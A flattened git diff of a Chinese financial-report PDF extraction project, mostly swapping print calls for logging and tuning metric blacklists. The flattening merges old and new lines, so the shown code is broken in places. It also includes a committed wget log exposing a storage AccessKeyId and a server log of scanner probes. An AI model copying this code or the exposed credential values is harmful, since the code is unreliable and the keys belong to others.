match = re.search(pattern1, text)
# 如果找到匹配项,返回 True否则返回 False
return bool(match)
def get_clean_text(text):
import re
pattern = r"\[^)]*?\"
matches = re.findall(pattern, text)
for match in matches:
# 使用 re.findall 函数查找括号内的内容中是否包含月份或关键词
month_keywords_found = re.search(r"归属于|扣非", match)
if not month_keywords_found:
# 如果包含,则从文本中删除该部分
text = re.sub(pattern,"", text)
else:
# 如果不包含,删除所有标点符号和中文数字
text = re.sub(r"[^\w\s]", "", text)
print(text)
def insert_and_update(conn,cursor,client,parent_table_pages,file_id,path):
# #通过向量查询指标
db_service.insert_table_measure_from_vector(conn,cursor,client,parent_table_pages,file_id,path)
# #指标归一化处理
db_service.update_ori_measure(conn,cursor,file_id)
def print_measure_data(cursor,client):
select_query = '''
SELECT ori_measure_name,measure_name,ori_measure_id FROM measure_config
where measure_id not in(select distinct measure_id from ori_measure_list where file_id='64')
'''
cursor.execute(select_query)
records = cursor.fetchall()
for record in records:
ori_measure_name = record[0]
measure_name = record[1]
ori_measure_id = record[2]
measure_vector = redis_service.read_from_redis(ori_measure_id)
measure_list = ast.literal_eval(measure_vector)
data = [measure_list]
res = client.search(
collection_name="pdf_measure_v4", # Replace with the actual name of your collection
# Replace with your query vector
data=data,
limit=2, # Max. number of search results to return
search_params={"metric_type": "COSINE", "params": {}}, # Search parameters
output_fields=["measure_name","measure_value","table_num","table_index"],
filter = 'file_id == "64"'
)
vector_str = measure_name+":"+ori_measure_name
# Convert the output to a formatted JSON string
for i in range(len(res[0])):
vector_distance = float(res[0][i]["distance"])
vector_measure_name = res[0][i]["entity"]["measure_name"]
measure_value = res[0][i]["entity"]["measure_value"]
table_num = res[0][i]["entity"]["table_num"]
table_index = res[0][i]["entity"]["table_index"]
table_num_list = [106]
print(vector_str +":"+vector_measure_name+":"+str(vector_distance) +":"+measure_value +":"+str(table_num) +":"+str(table_index))
# if vector_distance > 0.89 and table_num not in table_num_list:
# print(vector_str +":"+vector_measure_name+":"+str(vector_distance) +":"+measure_value +":"+str(table_num) +":"+str(table_index)+":"+str(0.94))
# if vector_distance > distance and table_num not in table_num_list:
# print(vector_str +":"+vector_measure_name +":"+measure_value +":"+str(table_num) +":"+str(table_index)+":"+str(vector_distance)+":"+str(distance))
list1 = [['2将重分类进损益的其他综合收益', '', '-135441.46', '58032.20'], ['1权益法下可转损益的其他综合收益', '', '', ''], ['2其他债权投资公允价值变动', '', '', ''], ['3金融资产重分类计入其他综合收益的金额', '', '', ''], ['4其他债权投资信用减值准备', '', '', ''], ['5现金流量套期储备', '', '', ''], ['6外币财务报表折算差额', '', '-135441.46', '58032.20'], ['7其他', '', '', ''], ['(二)归属于少数股东的其他综合收益的税后净额', '', '', ''], ['七、综合收益总额', '', '-154059285.14', '15109700.10'], ['(一)归属于母公司所有者的综合收益总额', '', '-153881248.66', '15109700.10'], ['(二)归属于少数股东的综合收益总额', '', '-178036.48', ''], ['八、每股收益:', '八、每股收益:', '八、每股收益:', '八、每股收益:'], ['(一)基本每股收益(元/股) -0.6693 0.0715', '(一)基本每股收益(元/股) -0.6693 0.0715', '(一)基本每股收益(元/股) -0.6693 0.0715', '(一)基本每股收益(元/股) -0.6693 0.0715'], ['(二)稀释每股收益(元/股) -0.6693 0.0714', '(二)稀释每股收益(元/股) -0.6693 0.0714', '(二)稀释每股收益(元/股) -0.6693 0.0714', '(二)稀释每股收益(元/股) -0.6693 0.0714']]
# 测试代码
if __name__ == "__main__": if __name__ == "__main__":
conn = mysql.connector.connect(
host=MYSQL_HOST,
user=MYSQL_USER,
password=MYSQL_PASSWORD,
database=MYSQL_DB
)
cursor = conn.cursor()
insert_measure_vector(conn,cursor) for lines in list1:
line = list(set(lines))
print(line)

View File

@ -7,6 +7,8 @@ from pdfminer.layout import LTTextContainer, LTChar, LTRect, LTFigure
import pdfplumber import pdfplumber
import os import os
import logging
log = logging.getLogger(__name__)
# 创建一个文本提取函数 # 创建一个文本提取函数
@ -125,8 +127,8 @@ for pagenum, page in enumerate(extract_pages(pdf_path)):
upper_side = element.y1 upper_side = element.y1
# 从表中提取信息 # 从表中提取信息
table = extract_table(pdf_path, pagenum, table_num) table = extract_table(pdf_path, pagenum, table_num)
# print('第'+str(pagenum)+'页第'+str(table_num)+'个表格') # log.info('第%s页第%s个表格', str(pagenum), str(table_num))
# print(table) # log.info(table)
# 将表信息转换为结构化字符串格式 # 将表信息转换为结构化字符串格式
table_string = table_converter(table) table_string = table_converter(table)
# 将表字符串追加到列表中 # 将表字符串追加到列表中
@ -148,15 +150,15 @@ for pagenum, page in enumerate(extract_pages(pdf_path)):
first_element = True first_element = True
table_num+=1 table_num+=1
print(''+str(pagenum)+'部分') log.info('%s部分', str(pagenum))
print('page_text:') log.info('page_text:')
print(page_text) log.info(page_text)
#print('line_format:') #log.info('line_format:')
#print(line_format) #log.info(line_format)
#print('text_from_tables:') #log.info('text_from_tables:')
#print(text_from_tables) #log.info(text_from_tables)
#print('page_content:') #log.info('page_content:')
#print(page_content) #log.info(page_content)
# 创建字典的键 # 创建字典的键
dctkey = 'Page_'+str(pagenum) dctkey = 'Page_'+str(pagenum)
@ -171,7 +173,7 @@ pdfFileObj.close()
# 显示页面内容 # 显示页面内容
# result = ''.join(text_per_page['Page_0'][4]) # result = ''.join(text_per_page['Page_0'][4])
# print(result) # log.info(result)
# result1 = ''.join(text_per_page['Page_1'][4]) # result1 = ''.join(text_per_page['Page_1'][4])
# print(result1) # log.info(result1)

View File

@ -4,6 +4,9 @@ import PyPDF2
from pdfminer.high_level import extract_pages from pdfminer.high_level import extract_pages
from pdfminer.layout import LTTextContainer, LTRect from pdfminer.layout import LTTextContainer, LTRect
import pdfplumber import pdfplumber
import logging
log = logging.getLogger(__name__)
import os import os
@ -82,7 +85,7 @@ for pagenum, page in enumerate(extract_pages(pdf_path)):
text_obj['page_num'] = pagenum text_obj['page_num'] = pagenum
text_obj['text'] = page_text text_obj['text'] = page_text
print("pagenum:",pagenum," text:",page_text) log.info("pagenum: %s text: %s", pagenum, page_text)
# 打印提取的文本 # 打印提取的文本
# print(page_obj) # log.info(page_obj)

View File

@ -1,5 +1,7 @@
import os import os
import re import re
import logging
log = logging.getLogger(__name__)
from tqdm import tqdm from tqdm import tqdm
from pdfminer.pdfparser import PDFParser,PDFDocument from pdfminer.pdfparser import PDFParser,PDFDocument
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
@ -24,7 +26,7 @@ def pdf_parse(pdf_path,txt_path):
#检测文档是否提供txt转换不提供就忽略 #检测文档是否提供txt转换不提供就忽略
if not doc.is_extractable: if not doc.is_extractable:
print(pdf_path) log.info(pdf_path)
raise PDFTextExtractionNotAllowed raise PDFTextExtractionNotAllowed
else: else:
#创建PDF资源管理器来共享资源 #创建PDF资源管理器来共享资源
@ -48,7 +50,7 @@ def pdf_parse(pdf_path,txt_path):
if(isinstance(x,LTTextBoxHorizontal)): if(isinstance(x,LTTextBoxHorizontal)):
with open(txt_path,'a') as f: with open(txt_path,'a') as f:
results = x.get_text() results = x.get_text()
# print(results) # log.info(results)
f.write(results +"\n") f.write(results +"\n")
@ -68,5 +70,5 @@ if __name__ == '__main__':
txt_path = save_txt_path+txt_name txt_path = save_txt_path+txt_name
pdf_parse(pdf_path, txt_path) pdf_parse(pdf_path, txt_path)
except: except:
print("转换失败:", pdf_name) log.info("转换失败:%s", pdf_name)
continue continue

View File

@ -4,6 +4,8 @@ import os
import json import json
import numpy as np import numpy as np
from datetime import datetime from datetime import datetime
import logging
logger = logging.getLogger(__name__)
# 读取PDF # 读取PDF
import PyPDF2 import PyPDF2
# 分析PDF的layout提取文本 # 分析PDF的layout提取文本
@ -230,7 +232,7 @@ def get_measure_from_llm(user_prompt):
llm_measure_list = result.split('\n') llm_measure_list = result.split('\n')
return llm_measure_list return llm_measure_list
else: else:
print('Request id: %s, Status code: %s, error code: %s, error message: %s' % ( logger.error('Request id: %s, Status code: %s, error code: %s, error message: %s' % (
response.request_id, response.status_code, response.request_id, response.status_code,
response.code, response.message response.code, response.message
)) ))
@ -270,7 +272,7 @@ def parse_llm_measure_to_db(measure_info,type,conn,cursor):
ori_measure_id = get_md5(ori_measure_name) ori_measure_id = get_md5(ori_measure_name)
data_to_insert = (file_id, file_name, type, int(page_num), int(table_index), ori_measure_id, ori_measure_name, ori_measure_value, create_time, create_time) data_to_insert = (file_id, file_name, type, int(page_num), int(table_index), ori_measure_id, ori_measure_name, ori_measure_value, create_time, create_time)
cursor.execute(insert_query, data_to_insert) cursor.execute(insert_query, data_to_insert)
print(f"{type},{page_num},{table_index},{ori_measure_name},{ori_measure_value}") logger.info(f"{type},{page_num},{table_index},{ori_measure_name},{ori_measure_value}")
# 提交事务 # 提交事务
conn.commit() conn.commit()
@ -300,7 +302,7 @@ def update_ori_measure(conn,cursor):
if __name__ == "__main__": if __name__ == "__main__":
start_time = datetime.now() start_time = datetime.now()
print("开始时间:", start_time.strftime("%Y-%m-%d %H:%M:%S")) logger.info("开始时间:", start_time.strftime("%Y-%m-%d %H:%M:%S"))
path = "/Users/zhengfei/Desktop/科润智控1.pdf" path = "/Users/zhengfei/Desktop/科润智控1.pdf"
table_info = get_table_measure(path) table_info = get_table_measure(path)
@ -324,10 +326,10 @@ if __name__ == "__main__":
table_index = table_obj['page_num'].split("_")[1] table_index = table_obj['page_num'].split("_")[1]
table_measure = ','.join(table_obj['measure_list']) table_measure = ','.join(table_obj['measure_list'])
if table_page_num == '3': if table_page_num == '3':
print(f"{table_page_num}页表格指标为:{table_measure}") logger.info(f"{table_page_num}页表格指标为:{table_measure}")
table_llm_measure = get_measure_from_llm(table_measure) table_llm_measure = get_measure_from_llm(table_measure)
if table_page_num == '3': if table_page_num == '3':
print(f"{table_page_num}页表格llm指标为{table_llm_measure}") logger.info(f"{table_page_num}页表格llm指标为{table_llm_measure}")
# table_measure_obj['page_num'] = table_page_num # table_measure_obj['page_num'] = table_page_num
# table_measure_obj['table_index'] = table_index # table_measure_obj['table_index'] = table_index
# table_measure_obj['llm_measure'] = table_llm_measure # table_measure_obj['llm_measure'] = table_llm_measure
@ -352,5 +354,5 @@ if __name__ == "__main__":
# parse_llm_measure_to_db(measure_info) # parse_llm_measure_to_db(measure_info)
# get_measure_from_llm() # get_measure_from_llm()
end_time = datetime.now() end_time = datetime.now()
print("结束时间:", end_time.strftime("%Y-%m-%d %H:%M:%S")) logger.info("结束时间:", end_time.strftime("%Y-%m-%d %H:%M:%S"))
#print(pdf_data) #print(pdf_data)

View File

@ -19,6 +19,8 @@ from pymilvus import MilvusClient
#import pdf_title #import pdf_title
import numpy as np import numpy as np
#from multiprocessing import Process #from multiprocessing import Process
import logging
logger = logging.getLogger(__name__)
@ -81,9 +83,9 @@ def get_text_content_test(file_path,file_id,pages,tables_range):
# 记录需要过滤掉的页码 # 记录需要过滤掉的页码
if len(re.findall('母公司|现金流量表补充', line_text)) > 0: if len(re.findall('母公司|现金流量表补充', line_text)) > 0:
print('成功识别到了') logger.info('成功识别到了')
except Exception as e: except Exception as e:
print(f"Error processing page {pagenum+1}: {e}") logger.error(f"Error processing page {pagenum+1}: {e}")
pdf_path = r"combined_v61.pdf" pdf_path = r"combined_v61.pdf"
file_id = 1 file_id = 1

View File

@ -19,6 +19,8 @@ from pymilvus import MilvusClient
#import pdf_title #import pdf_title
import numpy as np import numpy as np
#from multiprocessing import Process #from multiprocessing import Process
import logging
logger = logging.getLogger(__name__)
STR_PATTERN = '营业收入|净利润|变动比例|损益|现金流量净额|现金净流量|现金流|每股收益|总资产|资产总额|收益率|货币资金|应收账款|存货|固定资产|在建工程|商誉|短期借款|应付账款|合同负债|长期借款|营业成本|销售费用|管理费用|财务费用|研发费用|研发投入' STR_PATTERN = '营业收入|净利润|变动比例|损益|现金流量净额|现金净流量|现金流|每股收益|总资产|资产总额|收益率|货币资金|应收账款|存货|固定资产|在建工程|商誉|短期借款|应付账款|合同负债|长期借款|营业成本|销售费用|管理费用|财务费用|研发费用|研发投入'
#负责表内一旦出现某个字符,整个表丢弃 #负责表内一旦出现某个字符,整个表丢弃
@ -202,7 +204,7 @@ tables_range = {}
# print('Task %s runs %0.2f seconds.' % (f'解析表格{pages}', (end - start))) # print('Task %s runs %0.2f seconds.' % (f'解析表格{pages}', (end - start)))
def get_table_range_test(file_path, file_id, pages, tables_range): def get_table_range_test(file_path, file_id, pages, tables_range):
print('Run task %s (%s)...' % (f'解析表格{pages}', os.getpid())) logger.info('Run task %s (%s)...' % (f'解析表格{pages}', os.getpid()))
start = time.time() start = time.time()
# conn = mysql.connector.connect( # conn = mysql.connector.connect(
@ -295,7 +297,7 @@ def get_table_range_test(file_path, file_id, pages, tables_range):
'table_index' : table_index, 'table_index' : table_index,
'page_num' : page_num, 'page_num' : page_num,
}) })
print(f"tables_range的值是{tables_range}") logger.debug(f"tables_range的值是{tables_range}")
# db_service.insert_pdf_parse_process({ # db_service.insert_pdf_parse_process({
# 'file_id': file_id, # 'file_id': file_id,
@ -319,7 +321,7 @@ def get_table_range_test(file_path, file_id, pages, tables_range):
# redis_client.close() # redis_client.close()
end = time.time() end = time.time()
print('Task %s runs %0.2f seconds.' % (f'解析表格{pages}', (end - start))) logger.info('Task %s runs %0.2f seconds.' % (f'解析表格{pages}', (end - start)))
get_table_range_test(file_path, file_id, pages, tables_range) get_table_range_test(file_path, file_id, pages, tables_range)

View File

@ -10,6 +10,12 @@ import requests
import config import config
import numpy as np import numpy as np
from docx2pdf import convert from docx2pdf import convert
from config import api_key
import logging
logger = logging.getLogger(__name__)
dashscope.api_key = api_key
def get_md5(str): def get_md5(str):
import hashlib import hashlib
@ -20,25 +26,27 @@ def get_md5(str):
def embed_with_str(input): def embed_with_str(input):
retry = 0 retry = 0
max_retry = 5 max_retry = 5
t = 0.1 t = 0.2
while retry < max_retry: while retry < max_retry:
# time.sleep(t)
#阿里接口限流 #阿里接口限流
time.sleep(t)
resp = dashscope.TextEmbedding.call( resp = dashscope.TextEmbedding.call(
model=dashscope.TextEmbedding.Models.text_embedding_v2, model=dashscope.TextEmbedding.Models.text_embedding_v2,
input=input) input=input)
if resp.status_code == HTTPStatus.OK: if resp.status_code == HTTPStatus.OK:
return resp return resp
elif resp.status_code == 429: elif resp.status_code == 429:
print(f'触发限流,等待{t}秒后重试') logger.info(f'触发限流,等待{t}秒后重试')
retry += 1 retry += 1
t+=0.1 t+=0.1
else: else:
print(f'请求失败,状态码:{resp.status_code}') logger.error(f'请求失败,状态码:{resp.status_code}')
return None return None
print('重试超过上限') logger.error('重试超过上限')
return None return None
#如果存在‘归属于|扣非’,就保留括号内的内容,并去掉标点符号和中文数字。 #如果存在‘归属于|扣非’,就保留括号内的内容,并去掉标点符号和中文数字。
#如果存在季度关键词,就将括号内容替换为季度 #如果存在季度关键词,就将括号内容替换为季度
#如果存在‘±’,就将括号内容替换为同期增减 #如果存在‘±’,就将括号内容替换为同期增减
@ -89,7 +97,7 @@ def get_clean_text(text):
return pattern.sub(lambda match: replacements[match.group(0)], text) return pattern.sub(lambda match: replacements[match.group(0)], text)
text = replace_all(text, replacement_dict) text = replace_all(text, replacement_dict)
#单独出现12月31日时就剔除掉 #单独出现12月31日时就剔除掉
pattern_year = r'(?<!2023年|2022年|2021年)12月31日' pattern_year = r'(?<!2025年|2024年|2023年|2022年|2021年)12月31日'
text = re.sub(pattern_year, '', text) text = re.sub(pattern_year, '', text)
pattern = r"\[^]*\|\([^)]*\)" # 增加英文括号的匹配 pattern = r"\[^]*\|\([^)]*\)" # 增加英文括号的匹配
@ -137,11 +145,11 @@ def convert_docx_to_pdf(file_path):
try: try:
# 执行转换 # 执行转换
convert(file_path, pdf_path) convert(file_path, pdf_path)
print(f"转换成功: {pdf_path}") logger.info(f"转换成功: {pdf_path}")
except Exception as e: except Exception as e:
print(f"转换失败: {e}") logger.error(f"转换失败: {e}")
else: else:
print("错误: 文件必须是 .docx 格式。") logger.error("错误: 文件必须是 .docx 格式。")
def save_pdf_from_url(url, file_path): def save_pdf_from_url(url, file_path):
from urllib.parse import unquote from urllib.parse import unquote
@ -163,10 +171,10 @@ def save_pdf_from_url(url, file_path):
with open(local_file_path, 'wb') as file: with open(local_file_path, 'wb') as file:
file.write(response.content) file.write(response.content)
print(f"文件已下载到 {local_file_path}") logger.info(f"文件已下载到 {local_file_path}")
else: else:
# 文件下载失败 # 文件下载失败
print(f"无法下载文件,状态码:{response.status_code}") logger.error(f"无法下载文件,状态码:{response.status_code}")
return local_file_path return local_file_path
@ -252,7 +260,7 @@ def get_season_flag(text):
return '0' return '0'
def get_percent_flag(text): def get_percent_flag(text):
percent_word = '收益率|占比|比重|比例|同比增减|同比上升|同比下降|变化幅度|同期增减|本年比上年增减|同比变动|变动比例|本年度比上年度增减|增减' percent_word = '收益率|占比|比重|比例|同比增减|同比上升|同比下降|变化幅度|同期增减|本年比上年增减|同比变动|本期期末金额较上期期末变动比例'
if len(re.findall(percent_word, text)) > 0: if len(re.findall(percent_word, text)) > 0:
return '1' return '1'
else: else:
@ -293,40 +301,7 @@ def check_black_list(meta_measure, pdf_measure, black_array):
def check_black_list_old(meta_measure,pdf_measure): def check_black_list_old(meta_measure,pdf_measure):
# 判断指标名是否包含黑名单词 # 判断指标名是否包含黑名单词
#black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额','营业收入:营业外收入,主营业务,营业总收入,扣除,年度公司','归母净利润:净资产,净利率,扣除,年度公司','扣非净利润:净资产,净利率,年度公司','经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计','投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计','非经常性损益:扣除非经常性损益','基本每股收益:稀释每股收益','稀释每股收益:基本每股收益','总资产:净资产','应收账款:应付账款','短期借款:长期借款','应付账款:应收账款','长期借款:短期借款','研发投入:比例,比率,占比,费用','资本化研发投入:比例,比率,占比,费用','资本化研发投入占比:金额,费用','研发投入占营业收入比例:金额,费用','上年年末:1月1日'] black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额','营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司','归母净利润:净资产,净利率,扣除,年度公司','扣非净利润:净资产,净利率,年度公司','经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计','投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计','非经常性损益:扣除非经常性损益','基本每股收益:稀释每股收益','稀释每股收益:基本每股收益','总资产:净资产','应收账款:应付账款','短期借款:长期借款','应付账款:应收账款','长期借款:短期借款','研发投入:比例,比率,占比,费用','资本化研发投入:比例,比率,占比,费用','资本化研发投入占比:金额,费用','研发投入占营业收入比例:金额,费用']
black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额,合计'
,'营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司,合计,汇总'
,'归母净利润:净资产,净利率,扣除,年度公司,归属于本公司普通股股东的净利润'
,'扣非净利润:净资产,净利率,年度公司'
,'经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计,每股,扣除'
,'筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计,每股,扣除'
,'投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计,每股,扣除'
,'非经常性损益:扣除非经常性损益'
,'基本每股收益:稀释每股收益,发行新股'
,'稀释每股收益:基本每股收益,发行新股'
,'总资产:净资产','应收账款:应付账款,年以上,内,至,到'
,'短期借款:长期借款,非流动负债,年以上,年以内,内,至,到'
,'应付账款:应收账款,年以上,内,至,到'
,'长期借款:短期借款,非流动负债,年以上,内,至,到,保证,抵押'
,'研发投入:比例,比率,占比,费用,占'
,'资本化研发投入:比例,比率,占比,费用,占'
,'资本化研发投入占比:金额,费用'
,'研发投入占营业收入比例:金额,费用'
,'上年年末:1月1日'
,'期加权平均净资产收益率:同比,扣除,扣非,年化,每股'
,'期扣非加权平均净资产收益率:同比,年化,每股'
,'加权平均净资产收益率同比变动:年化,每股'
,'研发费用:制造,投入,直接,管理'
,'应收账款:1-2年','货币资金:在途'
,'当期:2023年1-6月,调整后'
,'营业成本:营业总成本'
,'长期借债:年内到期','研发投入:直接'
,'第一季度:第二季度,第三季度,第四季度'
,'第二季度:第一季度,第三季度,第四季度'
,'第三季度:第二季度,第一季度,第四季度'
,'第四季度:第二季度,第三季度,第一季度'
,'研发费用:研发支出,研发投入','存货:跌价准备'
,'费用:日常,付现','固定资产:改良,补助,投资']
# current_period = f'当期:{report_year}年1-6月' # current_period = f'当期:{report_year}年1-6月'
# black_array.append(current_period) # black_array.append(current_period)
for black in black_array: for black in black_array:
@ -550,26 +525,26 @@ def check_black_table_list(data):
black_meta = black.split(':')[0] black_meta = black.split(':')[0]
black_pdfs = black.split(':')[1].split(',') black_pdfs = black.split(':')[1].split(',')
if any(black_meta in cell for row in data for cell in row): if any(black_meta in cell for row in data for cell in row):
print(data) logger.debug(data)
for pdf in black_pdfs: for pdf in black_pdfs:
data = [row for row in data if not any(pdf in cell for cell in row)] data = [row for row in data if not any(pdf in cell for cell in row)]
return data return data
if __name__ == '__main__': if __name__ == '__main__':
print(len('我是我')) logger.debug(len('我是我'))
# print(under_non_alpha_ratio('202水电费水电费水电费是的205月')) # logger.debug(under_non_alpha_ratio('202水电费水电费水电费是的205月'))
# title = '母公司财务报表主要项目注释' # title = '母公司财务报表主要项目注释'
# if len(re.findall('母公司|现金流量表补充', title)) >0 and len(re.findall('项目注释', title)) == 0: # if len(re.findall('母公司|现金流量表补充', title)) >0 and len(re.findall('项目注释', title)) == 0:
# print('1') # logger.debug('1')
# else: # else:
# print('0') # logger.debug('0')
# print(check_black_list('当期投资活动现金流净额','当前筹资活动现金流净额')) # logger.debug(check_black_list('当期投资活动现金流净额','当前筹资活动现金流净额'))
# test = '2023年1-12月' # test = '2023年1-12月'
# print(get_period_type('上年度本期费用化研发投入')) # logger.debug(get_period_type('上年度本期费用化研发投入'))
# print(get_period_type('费用化研发投入本年度')) # logger.debug(get_period_type('费用化研发投入本年度'))
# vector_a = embed_with_str('第一季度营业收入') # vector_a = embed_with_str('第一季度营业收入')
# vector = vector_a.output["embeddings"][0]["embedding"] # vector = vector_a.output["embeddings"][0]["embedding"]
@ -577,7 +552,7 @@ if __name__ == '__main__':
# vector1 = vector_b.output["embeddings"][0]["embedding"] # vector1 = vector_b.output["embeddings"][0]["embedding"]
# similarity = cosine_similarity(vector, vector1) # similarity = cosine_similarity(vector, vector1)
# print(f"余弦相似度: {similarity}") # logger.debug(f"余弦相似度: {similarity}")
# measure_data = [ # measure_data = [
# '1,1,营业收入2023年金额,1003535799.51', # '1,1,营业收入2023年金额,1003535799.51',
@ -792,21 +767,14 @@ if __name__ == '__main__':
# ) # )
# vector_obj = embed_with_str('2023年营业收入') # vector_obj = embed_with_str('2023年营业收入')
# vector = vector_obj.output["embeddings"][0]["embedding"] # vector = vector_obj.output["embeddings"][0]["embedding"]
# data = [vector]
# res = client.search(
# collection_name="zzb_measure", # Replace with the actual name of your collection
# # Replace with your query vector
# data=data,
# limit=1, # Max. number of search results to return
# search_params={"metric_type": "COSINE", "params": {}}, # Search parameters
# output_fields=["measure_name","measure_value"]
# )
# # Convert the output to a formatted JSON string # vector_b = embed_with_str('营业收入第一季度')
# result = json.dumps(res, indent=4, ensure_ascii=False) # vector1 = vector_b.output["embeddings"][0]["embedding"]
# print(result)
# similarity = cosine_similarity(vector, vector1)
# logger.debug(f"余弦相似度: {similarity}")
# insert_measure_data(client, measure_data) # insert_measure_data(client, measure_data)
# text = '营业收入第一季度1-3月份' # text = '营业收入第一季度1-3月份'
# new_text = re.sub(r'[^)]*', '',text) # new_text = re.sub(r'[^)]*', '',text)
# print(new_text) # logger.debug(new_text)

3
zzb_data_prod/wget-log Normal file
View File

@ -0,0 +1,3 @@
--2024-12-27 11:22:17-- https://financial-report.obs.cn-east-3.myhuaweicloud.com/upload/file/44b374ac0fe140a2922c360db47335a1.PDF?AccessKeyId=WMBIZTLULUR24OBUIRC4
Resolving financial-report.obs.cn-east-3.myhuaweicloud.com (financial-report.obs.cn-east-3.myhuaweicloud.com)... failed: Name or service not known.
wget: unable to resolve host address financial-report.obs.cn-east-3.myhuaweicloud.com

View File

View File

@ -0,0 +1,14 @@
<?xml version="1.0" encoding="UTF-8"?>
<module type="PYTHON_MODULE" version="4">
<component name="NewModuleRootManager">
<content url="file://$MODULE_DIR$">
<excludeFolder url="file://$MODULE_DIR$/venv" />
</content>
<orderEntry type="jdk" jdkName="Python 3.8" jdkType="Python SDK" />
<orderEntry type="sourceFolder" forTests="false" />
</component>
<component name="PyDocumentationSettings">
<option name="format" value="PLAIN" />
<option name="myDocStringFormat" value="Plain" />
</component>
</module>

Binary file not shown.

Binary file not shown.

Binary file not shown.

View File

@ -28,42 +28,3 @@ def create_partition_by_hour(current_hour):
pre_partition.release() pre_partition.release()
collection.drop_partition(name) collection.drop_partition(name)
print(f"Partition '{name}' deleted.") print(f"Partition '{name}' deleted.")
from pymilvus import connections, CollectionSchema, Collection,utility,FieldSchema,DataType
# 连接到 B 服务器上的 Milvus
# connections.connect(host='124.70.129.232', port='19530')# 测试服务器
connections.connect(host='127.0.0.1', port='19530')# 测试服务器
# # 获取集合列表
utility.drop_collection("pdf_measure_v4")
# 定义字段
fields = [
FieldSchema(name="id", dtype=DataType.INT64, is_primary=True, auto_id=True),
FieldSchema(name="vector", dtype=DataType.FLOAT_VECTOR, dim=1536),
FieldSchema(name="table_num", dtype=DataType.INT16),
FieldSchema(name="table_index", dtype=DataType.INT16),
FieldSchema(name="measure_name", dtype=DataType.VARCHAR, max_length=200),
FieldSchema(name="measure_value", dtype=DataType.VARCHAR, max_length=200),
FieldSchema(name="file_id", dtype=DataType.VARCHAR, max_length=200),
FieldSchema(name="measure_unit", dtype=DataType.VARCHAR, max_length=200)
]
# 定义集合的 schema
schema = CollectionSchema(fields=fields, description="My Milvus collection")
# 创建集合
collection = Collection(name="pdf_measure_v4", schema=schema)
collection = Collection("pdf_measure_v4")
index_params = {
"index_type": "IVF_FLAT",
"metric_type": "COSINE",
"params": {"nlist": 128}
}
collection.create_index(field_name="vector", index_params=index_params)
collection.load()

5
zzb_data_word/app.log Normal file
View File

@ -0,0 +1,5 @@
nohup: ignoring input
INFO: Started server process [1654611]
INFO: Waiting for application startup.
INFO: Application startup complete.
INFO: Uvicorn running on http://0.0.0.0:8001 (Press CTRL+C to quit)

521
zzb_data_word/app_word.log Normal file
View File

@ -0,0 +1,521 @@
nohup: ignoring input
INFO: Started server process [2255841]
INFO: Waiting for application startup.
INFO: Application startup complete.
INFO: Uvicorn running on http://0.0.0.0:8001 (Press CTRL+C to quit)
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 80.66.83.46:32838 - "CONNECT 80.66.83.46%3A80 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 64.62.197.53:3545 - "GET / HTTP/1.1" 404 Not Found
INFO: 64.62.197.50:35771 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 64.62.197.47:13919 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 64.62.197.48:21545 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 185.191.126.248:57546 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 1.92.159.135:33735 - "HEAD / HTTP/1.1" 404 Not Found
INFO: 1.92.159.135:57283 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 111.7.96.172:12566 - "GET / HTTP/1.1" 404 Not Found
INFO: 123.249.108.188:15282 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 185.191.126.248:36188 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 95.214.53.211:49760 - "GET / HTTP/1.1" 404 Not Found
INFO: 13.58.97.162:57062 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 185.191.126.248:49978 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 39.105.14.55:35848 - "GET / HTTP/1.1" 404 Not Found
INFO: 39.105.14.55:35238 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 64.62.156.60:32883 - "GET / HTTP/1.1" 404 Not Found
INFO: 64.62.156.62:35677 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 64.62.156.63:36665 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 64.62.156.64:2695 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 154.212.141.167:39308 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 185.216.140.186:50780 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
INFO: 206.168.34.197:34136 - "GET / HTTP/1.1" 404 Not Found
INFO: 206.168.34.197:34148 - "PRI %2A HTTP/2.0" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 123.249.108.188:18897 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 204.188.228.42:37138 - "GET / HTTP/1.1" 404 Not Found
INFO: 87.236.176.70:45919 - "GET / HTTP/1.1" 404 Not Found
